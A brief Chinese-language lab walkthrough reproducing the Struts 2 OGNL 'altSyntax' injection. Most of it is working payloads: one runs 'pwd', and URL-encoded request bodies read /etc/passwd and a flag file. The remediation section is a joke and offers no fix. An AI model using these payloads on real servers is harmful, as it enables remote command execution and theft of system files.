一、漏洞情况分析
WebWork 2.1+ 和 Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中,并以递归方式进行处理。这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式,如果表单验证失败,服务器将执行该表达式
二、漏洞复现
进入靶场
开始复现
%{#a=(newjava.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
这个是直接放在框中的payload,能跑。
因为是靶场嘛,我刚开始想连nc的后面发现把payload换了之后连不上,很尴尬。
后面我通过查看nuclei的poc
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
这是ta的请求包的消息体,可以复制下来分析一下
我发现ta的cmd位置的空格使用","代替的,然后再url编码的
然后我重新构造payload将cat /etc/passwd改成cat /flag(这里的空格换成",")记得url编码
放到请求包的消息体中就行,直接用我的也行
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fflag%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
三、漏洞处置建议
早点睡吧,别学了,小命要紧